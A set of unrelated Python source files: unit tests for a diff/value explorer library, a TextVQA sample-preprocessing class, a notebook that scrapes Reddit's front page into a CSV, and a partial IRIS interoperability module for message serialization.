assert DiffersAtKey(d1, d2, 'a') != DiffersAtKey(d1, d2, 'b')
assert DiffersAtKey(d1, d2, 'a') != DiffersAtKey(d1, d1, 'a')
l1 = [1, 2]
l2 = [1, 2, 3]
n = DifferentLength(l1, l2)
assert n.message() == 'Different lengths: 2 != 3'
l1 = [1, 2]
l2 = (1, 2, 3)
n = DifferentTypes(l1, l2)
assert n.message() == ('Different types: {} != {}'
.format(str(list), str(tuple)))
s1 = {1, 2, 3}
s2 = {2, 3, 4}
n = SetDifferences(s1, s2)
assert n.message() == 'Exclusive items: {}'.format({1, 4})
d1 = dict(a=1, b=2)
d2 = dict(b=2)
n = KeyDifferences(d1, d2)
assert n.message() == 'Exclusive keys: {}'.format({'a'})
n = KeyDifferences(d2, d1)
assert n.message() == 'Exclusive keys: {}'.format({'a'})
f1 = Foo(1)
f2 = Foo(2)
n = DiffersAtAttribute(f1, f2, 'a')
assert n.message() == 'Objects differ at attribute "a": 1 != 2'
assert n != NotEqual(1, 2)
assert n.explorer().current_value == (1, 2)
#-------------------------------------------------------------------------------
# ValueExplorer
def test_valueexplorer():
x = ValueExplorer(1)
assert x.value == 1
assert x.current_value == 1
assert x.display() == u'1'
with capture() as (out, err):
x.command_display_value()
assert out.getvalue() == '1\n'
assert_raises(ExplorationError, x.step)
assert_raises(ExplorationError, x.down)
assert_raises(ExplorationError, x.up)
x = ValueExplorer([1, 2, 3])
assert x.current_value == 1
x.step()
assert x.current_value == 2
x.step()
assert x.current_value == 3
assert_raises(ExplorationError, x.step)
assert_raises(ExplorationError, x.up)
x.down()
assert x.value == 3
assert x.current_value == 3
x.up()
assert x.value == [1, 2, 3]
assert x.current_value == 3
assert_raises(ExplorationError, x.step)
x.down()
assert x.value == 3
x.up()
assert x.current_value == 3
x.step(-1)
assert x.current_value == 2
x.step()
assert x.current_value == 1
assert_raises(ExplorationError, x.step)
x.step(1)
assert x.current_value == 2
x.step()
assert x.current_value == 3
assert_raises(ExplorationError, x.step)
x.reset()
assert list(x.depth_first()) == [[1, 2, 3], 1, 2, 3]
x = ValueExplorer([])
assert x.value == []
assert x.current_value is None
assert_raises(ExplorationError, x.step)
assert list(x.depth_first()) == [[]]
l = [1, [2, 3], 4]
x = ValueExplorer(l)
assert list(x.depth_first()) == [l, 1, [2, 3], 2, 3, 4]
x = ValueExplorer(l, index=1)
assert list(x.depth_first()) == [l, [2, 3], 2, 3, 4]
x = ValueExplorer(l, index=2)
assert list(x.depth_first()) == [l, 4]
x = ValueExplorer(l, index=3)
assert list(x.depth_first()) == []
l = [1, [2, 3], [[4]]]
x = ValueExplorer(l)
assert list(x.depth_first()) == [l, 1, [2, 3], 2, 3, [[4]], [4], 4]
d = dict(a=1, b=2)
x = ValueExplorer(d)
assert set(list(x.depth_first())[1:]) == {1, 2}
d = dict(a=1, b=2, c=(3, 4))
x = ValueExplorer(d)
assert set(list(x.depth_first())[1:]) == {1, 2, (3, 4), 3, 4}
assert ValueExplorer(d, key='a').current_value == 1
assert ValueExplorer(d, key='b').current_value == 2
assert ValueExplorer(d, key='c').current_value == (3, 4)
assert_raises(ExplorationError, ValueExplorer, d, key='d')
d = dict(a=1, b=2, c=dict(a=3, b=4))
x = ValueExplorer(d)
dfl = list(item for item in x.depth_first() if not isinstance(item, dict))
assert set(dfl) == {1, 2, 3, 4}
x.reset()
assert set(x.depth_first(leaves_only=True)) == {1, 2, 3, 4}
s = set()
x = ValueExplorer(d, key='c')
assert x.current_value == dict(a=3, b=4)
x.down()
s.add(x.current_value)
x.step()
s.add(x.current_value)
assert_raises(ExplorationError, x.step)
assert x.at_end
assert s == {3, 4}
s = 'abcd'
x = ValueExplorer(s)
assert list(x.depth_first()) == ['abcd', 'a', 'b', 'c', 'd']
s = ''
x = ValueExplorer(s)
assert list(x.depth_first()) == ['']
x = ValueExplorer([])
assert list(x.depth_first()) == [[]]
class Foo(object):
def __init__(self, a, b):
self.a = a
self.b = b
f = Foo(1, 2)
x = ValueExplorer(f)
assert list(x.depth_first()) == [f, 1, 2]
#assert list(x.depth_first(leaves_only=True)) == [1, 2]
x = ValueExplorer(f, attr='b')
assert x.value is f
assert x.current_value == 2
assert x.attr == 'b'
assert x.index == 1
assert_raises(ExplorationError, ValueExplorer, f, attr='c')
def last_line(si):
return si.getvalue().split('\n')[-2]
l = [1, [2, 3], [[4]]]
r = ValueExplorer(l)
with capture() as (out, err):
r._eval('c')
assert last_line(out) == '1'
r._eval('l')
assert last_line(out) == '[1, [2, 3], [[4]]]'
r._eval('n 2')
r._eval('c')
assert last_line(out) == '[[4]]'
r._eval('d 2')
r._eval('c')
assert last_line(out) == '4'
r._eval('u 2')
r._eval('c')
assert last_line(out) == '[[4]]'
r._eval('n -1')
r._eval('c')
assert last_line(out) == '[2, 3]'
#-------------------------------------------------------------------------------
# DiffExplorer
def test_diffexplorer():
l1 = [1, 2, 3]
l2 = [1, 2, 4]
x = DiffExplorer(l1, l2)
assert x.display() == u'A: 1\nB: 1'
assert x.current_value == (1, 1)
x.step()
assert x.display() == u'A: 2\nB: 2'
x.down()
assert x.display() == u'A: 2\nB: 2'
x.up()
assert x.display() == u'A: 2\nB: 2'
x.step()
assert x.display() == u'A: 3\nB: 4'
assert_raises(ExplorationError, x.step)
x.step(-1)
assert x.display() == u'A: 2\nB: 2'
x.step()
assert x.display() == u'A: 1\nB: 1'
assert_raises(ExplorationError, x.step)
x.reset()
assert list(x.depth_first()) == [(l1, l2), (1, 1), (2, 2), (3, 4)]
def last_lines(si):
return si.getvalue().split('\n')[-3:-1]
l1 = [1, [2, 3], [[4]]]
l2 = [1, [2, 6], [[5]]]
r = DiffExplorer(ValueExplorer(l1), ValueExplorer(l2))
with capture() as (out, err):
r._eval('c')
assert last_lines(out) == ['A: 1', 'B: 1']
r._eval('l')
assert last_lines(out) == ['A: [1, [2, 3], [[4]]]',
'B: [1, [2, 6], [[5]]]']
r._eval('n 2')
r._eval('c')
assert last_lines(out) == ['A: [[4]]', 'B: [[5]]']
r._eval('d 2')
r._eval('c')
assert last_lines(out) == ['A: 4', 'B: 5']
r._eval('u 2')
r._eval('c')
assert last_lines(out) == ['A: [[4]]', 'B: [[5]]']
r._eval('n -1')
r._eval('c')
assert last_lines(out) == ['A: [2, 3]', 'B: [2, 6]']
d1 = dict(a = 1)
d2 = dict(a = 2)
r = DiffExplorer(d1, d2)
with capture() as (out, err):
r._eval('c')
assert last_lines(out) == ['A: 1', 'B: 2']
r._eval('l')
assert last_lines(out) == ["A: {'a': 1}", "B: {'a': 2}"]
class Bar(object):
def __init__(self, a, b):
self.a = a
self.b = b
b1 = Bar(1, [2, 3, 'abc'])
b2 = Bar(1, [2, 3, 'adc'])
accum = []
def fake_input(prompt):
accum.append(1)
if sum(accum) <= 1:
return 'f'
return 'q'
r = find_ne(b1,b2)
with assign(repl, 'raw_input', fake_input):
r()
#-------------------------------------------------------------------------------
# Utilities
def test_deep_comp():
from syn.types.a.ne import deep_comp
from syn.base_utils import feq
from functools import partial
cfeq = partial(feq, tol=0.1)
assert cfeq(4.05, 4.06)
def comp(a, b, func=cfeq):
if isinstance(a, float) and type(a) is type(b):
return func(a, b)
return a == b
l1 = [1, 2, [3, 4.05]]
l2 = [1, 2, [3, 4.06]]
assert deep_comp(l1, l1)
assert not deep_comp(l1, l2)
assert not deep_comp(l1, l2, comp)
assert deep_comp(l1, l2, comp, leaves_only=True)
assert not deep_comp(l1, l2, partial(comp, func=partial(feq, tol=0.001)),
leaves_only=True)
dcomp = partial(deep_comp, func=comp, leaves_only=True)
assert dcomp(l1, l2)
def test_deep_feq():
from syn.types.a import deep_feq
assert not deep_feq('abc', 'ab')
assert deep_feq('abc', 'abc')
assert deep_feq([], [])
assert not deep_feq([], ())
assert deep_feq([1, 2], [1, 2])
assert not deep_feq([1, 2], [1])
assert not deep_feq([[1, 2]], [(1, 2)])
assert not deep_feq([[]], [()])
assert not deep_feq(1, 1.01)
assert not deep_feq(1j, 1.01j)
assert deep_feq(1, 1.01, tol=0.1)
assert deep_feq(1j, 1.01j, tol=0.1)
assert not deep_feq([1], [1.01])
assert deep_feq([1], [1.01], tol=0.1)
assert deep_feq([1j], [1.01j], tol=0.1)
def test_is_visit_primitive():
from syn.types.a import is_visit_primitive
class Foo(object):
pass
f = Foo()
assert is_visit_primitive(1)
assert is_visit_primitive(int)
assert is_visit_primitive(Foo)
assert not is_visit_primitive([1, 2, 3])
assert is_visit_primitive('a')
assert not is_visit_primitive('ab')
assert is_visit_primitive(f)
assert list(visit(f)) == [f]
f.a = 1
assert not is_visit_primitive(f)
assert list(visit(f)) == [('a', 1)]
#-------------------------------------------------------------------------------
if __name__ == '__main__': # pragma: no cover
from syn.base_utils import run_all_tests
run_all_tests(globals(), verbose=True, print_errors=False)
|
import numpy as np
import torch
from ..builder import build_processor
from imix.utils.third_party_libs import VocabDict
from ..utils.stream import ItemFeature
from .base_infocpler import BaseInfoCpler
from imix.utils.config import imixEasyDict
from imix.utils.common_function import object_to_byte_tensor
from copy import deepcopy
import json
import os
class TextVQAAnswerProcessor:
def __init__(self, vocab_file: str):
self.answer_vocab = VocabDict(vocab_file)
self.PAD_IDX = self.answer_vocab.word2idx('<pad>')
self.BOS_IDX = self.answer_vocab.word2idx('<s>')
self.EOS_IDX = self.answer_vocab.word2idx('</s>')
self.UNK_IDX = self.answer_vocab.UNK_INDEX
# make sure PAD_IDX, BOS_IDX and PAD_IDX are valid (not <unk>)
assert self.PAD_IDX != self.answer_vocab.UNK_INDEX
assert self.BOS_IDX != self.answer_vocab.UNK_INDEX
assert self.EOS_IDX != self.answer_vocab.UNK_INDEX
assert self.PAD_IDX == 0
def get_true_vocab_size(self):
return self.answer_vocab.num_vocab
class TextVQAInfoCpler(BaseInfoCpler):
def __init__(self, cfg):
self.cfg = cfg
self.use_ocr = self.cfg.use_ocr
self.use_ocr_info = self.cfg.use_ocr_info
self.use_order_vectors = self.cfg.use_order_vectors
self.return_features_info = self.cfg.return_features_info
self.phoc_feature_path = getattr(self.cfg, 'phoc_feature_path', None)
self._init_processors()
def _init_processors(self):
self._init_text_processor()
self._init_copy_processor()
self._init_ocr_processor()
self._init_answer_processor()
def _init_answer_processor(self):
config = deepcopy(self.cfg.answer_processor)
self.answer_processor = build_processor(config)
def _init_copy_processor(self):
config = deepcopy(self.cfg.copy_processor)
self.copy_processor = build_processor(config)
def _init_text_processor(self):
config = deepcopy(self.cfg.text_processor)
self.text_processor = build_processor(config)
def _init_ocr_processor(self):
ocr_token_processor_cfg = deepcopy(self.cfg.ocr_token_processor)
self.ocr_token_processor = build_processor(ocr_token_processor_cfg)
if self.phoc_feature_path is None:
phoc_cfg = deepcopy(self.cfg.phoc_processor)
self.phoc_processor = build_processor(phoc_cfg)
else:
self.phoc_processor = None
context_cfg = deepcopy(self.cfg.context_processor)
self.context_processor = build_processor(context_cfg)
bbox_cfg = deepcopy(self.cfg.bbox_processor)
self.bbox_processor = build_processor(bbox_cfg)
def complete_info(self, item_feature: ItemFeature):
current_sample = ItemFeature()
# 1. Load text (question words)
current_sample = self.add_question_info(item_feature, current_sample)
# 2. Load object
# object bounding box information
current_sample = self.add_object_info(item_feature, current_sample)
# 3. Load OCR
current_sample = self.add_ocr_info(item_feature, current_sample)
# 4. load answer
current_sample = self.add_answer_info(item_feature, current_sample)
return current_sample
def add_question_info(self, item_feature: ItemFeature, sample: ItemFeature):
question_str = (item_feature['question'] if 'question' in item_feature else item_feature['question_str'])
text_processor_args = {'text': question_str}
if 'question_tokens' in item_feature:
text_processor_args['tokens'] = item_feature['question_tokens']
processed_question = self.text_processor(text_processor_args)
if 'input_ids' in processed_question:
sample.text = processed_question['input_ids']
sample.text_len = torch.tensor(len(processed_question['tokens']), dtype=torch.long)
else:
# For GLoVe based processors
sample.text = processed_question['text']
sample.text_len = processed_question['length']
return sample
def add_object_info(self, item_feature: ItemFeature, sample: ItemFeature):
if 'obj_normalized_boxes' in item_feature and hasattr(self, 'copy_processor'):
sample.obj_bbox_coordinates = self.copy_processor({'blob': item_feature['obj_normalized_boxes']})['blob']
return sample
def add_ocr_info(self, item_feature: ItemFeature, sample: ItemFeature):
sample_info = item_feature
if not self.use_ocr:
# remove all OCRs from the sample
# (i.e. make an empty OCR list)
sample_info['ocr_tokens'] = []
sample_info['ocr_info'] = []
if 'ocr_normalized_boxes' in sample_info:
sample_info['ocr_normalized_boxes'] = np.zeros((0, 4), np.float32)
# clear OCR visual features
if 'image_feature_1' in sample:
sample.image_feature_1 = torch.zeros_like(sample.image_feature_1)
return sample
# Preprocess OCR tokens
if hasattr(self, 'ocr_token_processor'):
ocr_tokens = [self.ocr_token_processor({'text': token})['text'] for token in sample_info['ocr_tokens']]
else:
ocr_tokens = sample_info['ocr_tokens']
# Get FastText embeddings for OCR tokens
context = self.context_processor({'tokens': ocr_tokens})
sample.context = context['text']
sample.ocr_tokens = context['tokens']
sample.context_tokens = object_to_byte_tensor(context['tokens'])
sample.context_feature_0 = context['text']
sample.context_info_0 = imixEasyDict()
sample.context_info_0.max_features = context['length']
# Get PHOC embeddings for OCR tokens
if hasattr(self, 'phoc_processor'):
if self.phoc_processor is None:
if item_feature.context_phoc is None:
phoc_file_name = f'{item_feature.set_name}_qid_{item_feature.question_id}.json'
context_phoc = self.get_phoc_feature(file_name=phoc_file_name)
else:
context_phoc = item_feature.context_phoc
sample.context_feature_1 = torch.Tensor(context_phoc['text'])
sample.context_info_1 = imixEasyDict()
sample.context_info_1.max_features = torch.tensor(context_phoc['length'])
else:
context_phoc = self.phoc_processor({'tokens': ocr_tokens})
sample.context_feature_1 = context_phoc['text']
sample.context_info_1 = imixEasyDict()
sample.context_info_1.max_features = context_phoc['length']
# OCR order vectors
if self.cfg.get('use_order_vectors', False):
order_vectors = np.eye(len(sample.ocr_tokens), dtype=np.float32)
order_vectors = torch.from_numpy(order_vectors)
order_vectors[context['length']:] = 0
sample.order_vectors = order_vectors
# OCR bounding box information
if 'ocr_normalized_boxes' in sample_info and hasattr(self, 'copy_processor'):
# New imdb format: OCR bounding boxes are already pre-computed
max_len = self.cfg.answer_processor.config.max_length
sample.ocr_bbox_coordinates = self.copy_processor({'blob':
sample_info['ocr_normalized_boxes']})['blob'][:max_len]
elif self.use_ocr_info and 'ocr_info' in sample_info:
# Old imdb format: OCR bounding boxes are computed on-the-fly
# from ocr_info
sample.ocr_bbox_coordinates = self.bbox_processor({'info': sample_info['ocr_info']})['bbox'].coordinates
return sample
def add_answer_info(self, item_feature: ItemFeature, sample: ItemFeature):
sample_info = item_feature
answers = sample_info.get('answers', [])
answer_processor_arg = {'answers': answers}
answer_processor_arg['tokens'] = sample.pop('ocr_tokens', [])
processed_answers = self.answer_processor(answer_processor_arg)
sample.update(processed_answers)
sample.answers = object_to_byte_tensor(answers)
if 'answers_scores' in sample:
sample.targets = sample.pop('answers_scores')
return sample
def get_phoc_feature(self, file_name):
with open(os.path.join(self.phoc_feature_path, file_name), 'r') as f:
phoc = json.load(f)
context_phoc = phoc['context_phoc']
return context_phoc
|
<gh_stars>0
# coding: utf-8
# # Reddit Part One: Getting Data
#
# You're going to scrape the front page of https://www.reddit.com! Reddit is a magic land made of many many semi-independent kingdoms, called subreddits. We need to find out which are the most powerful.
#
# You are going to scrape the front page of reddit every 4 hours, saving a CSV file that includes:
# * The title of the post
# * The number of votes it has (the number between the up and down arrows)
# * The number of comments it has
# * What subreddit it is from (e.g. /r/AskReddit, /r/todayilearned)
# * When it was posted (get a TIMESTAMP, e.g. 2016-06-22T12:33:58+00:00, not "4 hours ago")
# * The URL to the post itself
# * The URL of the thumbnail image associated with the post
#
# Note:
#
# <p>Ugh, reddit is horrible when it hasn't been customized to your tastes. If you would like something more exciting/less idiotic, try scraping a multireddit page - https://www.reddit.com/r/multihub/top/?sort=top&t=year - they're subreddits clustered by topics.
#
# <p>For example, you could scrape https://www.reddit.com/user/CrownReserve/m/improveyoself which is all self-improvement subreddits. You can follow the links at https://www.reddit.com/r/multihub/top/?sort=top&t=year or use the "Find Multireddits" link on the Multireddit page to find more.
# In[83]:
from bs4 import BeautifulSoup
import requests
user_agent = {'User-agent': 'Mozilla/5.0'}
html_str = requests.get('https://www.reddit.com/', headers = user_agent).text
# In[85]:
document = BeautifulSoup(html_str, 'html.parser')
# In[86]:
# The title of the post
# The whole post is under `<div>` class = ' thing id-t3_4 ....'
# <div> class = 'entry unvoted'
# <p> class = 'title'
# `<a>` class = 'title may-blank '
# The number of votes it has (the number between the up and down arrows)
# The number of votes is in <div> class = 'score unvoted'
# sometimes this is •
# The number of comments it has
# There's a
# <div> class = 'entry unvoted'
# <ul> class = 'flat-list buttons'
# <li> class = 'first'
# <a> class = 'bylink comments may-blank'
# What subreddit it is from (e.g. /r/AskReddit, /r/todayilearned)
# <div> class = 'entry unvoted'
# <p> class='tagline'
# <a> class = 'subreddit hover may-blank'
# When it was posted (get a TIMESTAMP, e.g. 2016-06-22T12:33:58+00:00, not "4 hours ago")
# <div> class = 'entry unvoted'
# <p> class='tagline'
# <time> it's actually in the tag
# The URL to the post itself
# This is in two places. Both inside the main <div> tag and in the same tag with the title.
# The URL of the thumbnail image associated with the post
# There are two thumbnail urls—the one I guess it's from orginially and the reddit thumbnail. Here's how to get the reddit thumbnail:
# <a> class = 'thumbnail may-blank'
# <img> it's actually in the tag
# What I eventually want:
# posts_today = [
# {'title': '"Two clowns in the same circus" 16 x 12s oil on linen'},
# {'votes': 4246},
# {'comments': 372},
# {'subreddit': '/r/Art'},
# {'timestamp': '2016-06-22T12:33:58+00:00'},
# {'url': 'https://www.reddit.com/r/Art/comments/4pbvk5/two_clowns_in_the_same_circus_16_x_12s_oil_on/'},
# {'thumb_url': 'https://b.thumbs.redditmedia.com/p32PnbLD9t9hqvw9Q5X7eZS2tI7Ygqnh5K5MTxOERSE.jpg'}
# ]
# In[148]:
import re
# In[272]:
non_ads = document.find('div', {'id': 'siteTable'})
one_sibling_up = non_ads.find_all('div', {'class': 'clearleft'})
# In[89]:
# troubleshooting
# document
# In[273]:
# because only every other clearleft has a post in it:
posts = [tag.find_next_sibling('div') for tag in one_sibling_up if tag.find_next_sibling('div')]
# In[97]:
def title(post):
if post.find('a', {'class': 'title may-blank '}):
return post.find('a', {'class': 'title may-blank '}).string
else:
return 'NO TITLE'
# In[164]:
def votes(post):
if post.find('div', {'class': 'score unvoted'}):
return int(post.find('div', {'class': 'score unvoted'}).string)
else:
return 'NO INFO'
# In[156]:
def comments(post):
if post.find('a', {'class': 'bylink comments may-blank'}):
comment_string = post.find('a', {'class': 'bylink comments may-blank'}).text
comment_non_int = comment_string.replace(' comments', '').replace(' comment', '')
return int(comment_non_int)
else:
return 0
# In[162]:
def subreddit(post):
if post.find('a', {'class': 'subreddit hover may-blank'}):
return post.find('a', {'class': 'subreddit hover may-blank'}).text
else:
return 'NO SUBREDDIT'
# In[262]:
# Doing timestamp with regular expressions
# # When it was posted (get a TIMESTAMP, e.g. 2016-06-22T12:33:58+00:00, not "4 hours ago")
# # <div> class = 'entry unvoted'
# # <p> class='tagline'
# # <time> it's actually in the tag
# # Regular Expressions only works on strings, not Beautiful Soup objects.
# # Even document is a Beautiful Soup object, so you need to go back to html_str
# timestamps = re.findall(r'datetime="(\S+)"', html_str)
# timestamps
# # Since I want to cut out the first 9 results. First one: 2016-06-22T19:52:01+00:00
# list_number = 8
# for post in posts:
# list_number += 1
# print(timestamps[list_number])
# In[265]:
def timestamp(post):
time = post.find('time')
if time:
return time.get('datetime')
else:
return 'NO TIMESTAMP'
# In[252]:
# Doing url with regular expressions
# # The URL to the post itself
# # This is in two places. Both inside the main <div> tag and in the same tag with the title.
# urls = re.findall(r'<a class="title may-blank " href="(\S+)"', html_str)
# urls
# In[260]:
def url(post):
if post.get('data-url'):
if post.get('data-url')[:2] == '/r':
return 'https://www.reddit.com/' + post.get('data-url')
else:
return post.get('data-url')
else:
return 'NO URL'
# In[251]:
# My unfinished, really messy attempt at trying to do thumb_url with regular expressions:
# #<img src="//\w.thumbs.redditmedia.com/[\w-]+.jpg"
# thumb_urls = re.findall(r'<a class=("thumbnail s*e*l*f* *may-blank a*f*f*i*l*i*a*t*e* *") href="([/:\w\._]+)" rel="\w*" ><img src=("//\w.thumbs.redditmedia.com/[\w-]+.jpg")', html_str)
# print(len(thumb_urls))
# thumb_urls
# In[248]:
def thumb_url(post):
image = post.find('img')
if image:
return image.get('src')
else:
return 'NO THUMBNAIL'
# In[275]:
posts_today = []
post_dict = {}
for post in posts:
post_dict['title'] = title(post)
post_dict['votes'] = votes(post)
post_dict['comments'] = comments(post)
post_dict['subreddit'] = subreddit(post)
post_dict['timestamp'] = timestamp(post)
post_dict['url'] = url(post)
post_dict['thumb_url'] = thumb_url(post)
posts_today.append(post_dict)
post_dict = {}
print(len(posts_today))
posts_today
# In[268]:
import pandas as pd
# In[276]:
posts_today_csv = pd.DataFrame(posts_today)
posts_today_csv
# # Reddit Part Two: Sending data
#
# You'd like to get something in your inbox about what's happening on reddit every morning at 8:30AM. Using a mailgun.com account and their API, send an email to your email address with the the CSV you saved at 8AM attached. The title of the email should be something like "Reddit this morning: January, 1 1970"
#
# <p>TIP: How are you going to find that csv file? Well, think about how specific the datetime stamp in the filename really needs to be.
# In[270]:
import time
datestring = time.strftime('%Y-%m-%d')
filename = 'reddit-data-' + datestring + '.csv'
posts_today_csv.to_csv(filename, index=False)
|
<filename>src/python/grongier/pex/_business_host.py<gh_stars>0
import datetime
import pickle
import codecs
import uuid
import decimal
import base64
import json
import importlib
import iris
from inspect import signature
from grongier.dacite import from_dict
from grongier.pex._common import _Common
class _BusinessHost(_Common):
""" This is a superclass for BusinessService, BusinesProcess, and BusinessOperation that
defines common methods. It is a subclass of Common.
"""
buffer:int = 64000
def input_serialzer(fonction):
def dispatch_serializer(self,*params, **param2):
serialized=[]
for param in params:
serialized.append(self._dispatch_serializer(param))
return fonction(self,*serialized, **param2)
return dispatch_serializer
def output_deserialzer(fonction):
def dispatch_deserializer(self,*params, **param2):
return self._dispatch_deserializer(fonction(self,*params, **param2))
return dispatch_deserializer
def input_deserialzer(fonction):
def dispatch_deserializer(self,*params, **param2):
serialized=[]
for param in params:
serialized.append(self._dispatch_deserializer(param))
return fonction(self,*serialized, **param2)
return dispatch_deserializer
def output_serialzer(fonction):
def dispatch_serializer(self,*params, **param2):
return self._dispatch_serializer(fonction(self,*params, **param2))
return dispatch_serializer
@input_serialzer
@output_deserialzer
def send_request_sync(self, target, request, timeout=-1, description=None):
""" Send the specified message to the target business process or business operation synchronously.
Parameters:
target: a string that specifies the name of the business process or operation to receive the request.
The target is the name of the component as specified in the Item Name property in the production definition, not the class name of the component.
request: specifies the message to send to the target. The request is either an instance of a class that is a subclass of Message class or of IRISObject class.
If the target is a build-in ObjectScript component, you should use the IRISObject class. The IRISObject class enables the PEX framework to convert the message to a class supported by the target.
timeout: an optional integer that specifies the number of seconds to wait before treating the send request as a failure. The default value is -1, which means wait forever.
description: an optional string parameter that sets a description property in the message header. The default is None.
Returns:
the response object from target.
Raises:
TypeError: if request is not of type Message or IRISObject.
"""
return self.iris_handle.dispatchSendRequestSync(target,request,timeout,description)
@input_serialzer
def send_request_async(self, target, request, description=None):
""" Send the specified message to the target business process or business operation asynchronously.
Parameters:
target: a string that specifies the name of the business process or operation to receive the request.
The target is the name of the component as specified in the Item Name property in the production definition, not the class name of the component.
request: specifies the message to send to the target. The request is an instance of IRISObject or of a subclass of Message.
If the target is a built-in ObjectScript component, you should use the IRISObject class. The IRISObject class enables the PEX framework to convert the message to a class supported by the target.
description: an optional string parameter that sets a description property in the message header. The default is None.
Raises:
TypeError: if request is not of type Message or IRISObject.
"""
return self.iris_handle.dispatchSendRequestAsync(target,request,description)
def _serialize_pickle_message(self,message):
""" Converts a python dataclass message into an iris grongier.pex.message.
Parameters:
message: The message to serialize, an instance of a class that is a subclass of Message.
Returns:
string: The message in json format.
"""
pickle_string = codecs.encode(pickle.dumps(message), "base64").decode()
module = message.__class__.__module__
classname = message.__class__.__name__
msg = iris.cls('Grongier.PEX.PickleMessage')._New()
msg.classname = module + "." + classname
stream = iris.cls('%Stream.GlobalCharacter')._New()
n = self.buffer
chunks = [pickle_string[i:i+n] for i in range(0, len(pickle_string), n)]
for chunk in chunks:
stream.Write(chunk)
msg.jstr = stream
return msg
def _dispatch_serializer(self,message):
if (message is not None and self._is_message_instance(message)):
return self._serialize_message(message)
elif (message is not None and self._is_pickle_message_instance(message)):
return self._serialize_pickle_message(message)
else:
return message
def _serialize_message(self,message):
""" Converts a python dataclass message into an iris grongier.pex.message.
Parameters:
message: The message to serialize, an instance of a class that is a subclass of Message.
Returns:
string: The message in json format.
"""
json_string = json.dumps(message, cls=IrisJSONEncoder)
module = message.__class__.__module__
classname = message.__class__.__name__
msg = iris.cls('Grongier.PEX.Message')._New()
msg.classname = module + "." + classname
stream = iris.cls('%Stream.GlobalCharacter')._New()
n = self.buffer
chunks = [json_string[i:i+n] for i in range(0, len(json_string), n)]
for chunk in chunks:
stream.Write(chunk)
msg.jstr = stream
return msg
def _serialize(self,message):
""" Converts a message into json format.
Parameters:
message: The message to serialize, an instance of a class that is a subclass of Message.
Returns:
string: The message in json format.
"""
if (message is not None):
json_string = json.dumps(message, cls=IrisJSONEncoder)
module = message.__class__.__module__
classname = message.__class__.__name__
return module + "." + classname + ":" + json_string
else:
return None
def _deserialize_pickle_message(self,serial):
"""
Converts an iris grongier.pex.message into an python dataclass message.
"""
string = ""
serial.jstr.Rewind()
while not serial.jstr.AtEnd:
string += serial.jstr.Read(self.buffer)
msg = pickle.loads(codecs.decode(string.encode(), "base64"))
return msg
def _dispatch_deserializer(self,serial):
if (serial is not None and type(serial).__module__.find('iris') == 0) and serial._IsA("Grongier.PEX.Message"):
return self._deserialize_message(serial)
elif (serial is not None and type(serial).__module__.find('iris') == 0) and serial._IsA("Grongier.PEX.PickleMessage"):
return self._deserialize_pickle_message(serial)
else:
return serial
def _deserialize_message(self,serial):
"""
Converts an iris grongier.pex.message into an python dataclass message.
"""
if (serial.classname is None):
raise ValueError("JSON message malformed, must include classname")
classname = serial.classname
j = classname.rindex(".")
if (j <=0):
raise ValueError("Classname must include a module: " + classname)
try:
module = importlib.import_module(classname[:j])
msg = getattr(module, classname[j+1:])
except Exception:
raise ImportError("Class not found: " + classname)
string = ""
serial.jstr.Rewind()
while not serial.jstr.AtEnd:
string += serial.jstr.Read(self.buffer)
jdict = json.loads(string, cls=IrisJSONDecoder)
msg = self._dataclass_from_dict(msg,jdict)
return msg
def _deserialize(self,serial):
""" Converts a json string into a message of type classname, which is stored in the json string.
Parameters:
serial: The json string to deserialize.
Returns:
Message: The message as an instance of the class specified in the json string, which is a subclass of Message.
Raises:
ImportError: if the classname does not include a module name to import.
"""
if (serial is not None and serial != ""):
i = serial.find(":")
if (i <=0):
raise ValueError("JSON message malformed, must include classname: " + serial)
classname = serial[:i]
j = classname.rindex(".")
if (j <=0):
raise ValueError("Classname must include a module: " + classname)
try:
module = importlib.import_module(classname[:j])
msg = getattr(module, classname[j+1:])
except Exception:
raise ImportError("Class not found: " + classname)
jdict = json.loads(serial[i+1:], cls=IrisJSONDecoder)
msg = self._dataclass_from_dict(msg,jdict)
return msg
else:
return None
def _dataclass_from_dict(self,klass, dikt):
ret = from_dict(klass, dikt)
try:
fieldtypes = klass.__annotations__
except Exception as e:
fieldtypes = []
for key,val in dikt.items():
if key not in fieldtypes:
setattr(ret, key, val)
return ret
def _dispach_message(self, request):
"""
It takes a request object, and returns a response object
:param request: The request object
:return: The return value is the result of the method call.
"""
call = 'on_message'
module = request.__class__.__module__
classname = request.__class__.__name__
for msg,method in self.DISPATCH:
if msg == module+"."+classname:
call = method
return getattr(self,call)(request)
def _create_dispatch(self):
"""
It creates a list of tuples, where each tuple contains the name of a class and the name of a method
that takes an instance of that class as its only argument
:return: A list of tuples.
"""
if len(self.DISPATCH) == 0:
#get all function in current BO
method_list = [func for func in dir(self) if callable(getattr(self, func)) and not func.startswith("_")]
for method in method_list:
#get signature of current function
try:
param = signature(getattr(self, method)).parameters
# Handle staticmethod
except ValueError as e:
param=''
#one parameter
if (len(param)==1):
#get parameter type
annotation = str(param[list(param)[0]].annotation)
#trim annotation format <class 'toto'>
i = annotation.find("'")
j = annotation.rfind("'")
#if end is not found
if j == -1:
j = None
classname = annotation[i+1:j]
self.DISPATCH.append((classname,method))
return
@staticmethod
def OnGetConnections():
""" The OnGetConnections() method returns all of the targets of any SendRequestSync or SendRequestAsync
calls for the class. Implement this method to allow connections between components to show up in
the interoperability UI.
Returns:
An IRISList containing all targets for this class. Default is None.
"""
return None
def SendRequestSync(self, target, request, timeout=-1, description=None):
""" DEPRECATED : use send_request_sync
`SendRequestSync` is a function that sends a request to a target and waits for a response
:param target: The target of the request
:param request: The request to send
:param timeout: The timeout in seconds. If the timeout is negative, the default timeout will be used
:param description: A string that describes the request. This is used for logging purposes
:return: The return value is a tuple of (response, status).
"""
return self.send_request_sync(target,request,timeout,description)
def SendRequestAsync(self, target, request, description=None):
""" DEPRECATED : use send_request_async
It takes a target, a request, and a description, and returns a send_request_async function
:param target: The target of the request. This is the name of the function you want to call
:param request: The request to send
:param description: A string that describes the request
:return: The return value is a Future object.
"""
return self.send_request_async(target,request,description)
@staticmethod
def getAdapterType():
""" DEPRECATED : use get_adapter_type
Name of the registred Adapter
"""
return
@staticmethod
def get_adapter_type():
"""
Name of the registred Adapter
"""
return
# It's a subclass of the standard JSONEncoder class that knows how to encode date/time, decimal types,
# and UUIDs.
class IrisJSONEncoder(json.JSONEncoder):
"""
JSONEncoder subclass that knows how to encode date/time, decimal types, and
UUIDs.
"""
def default(self, o):
if hasattr(o, '__dict__'):
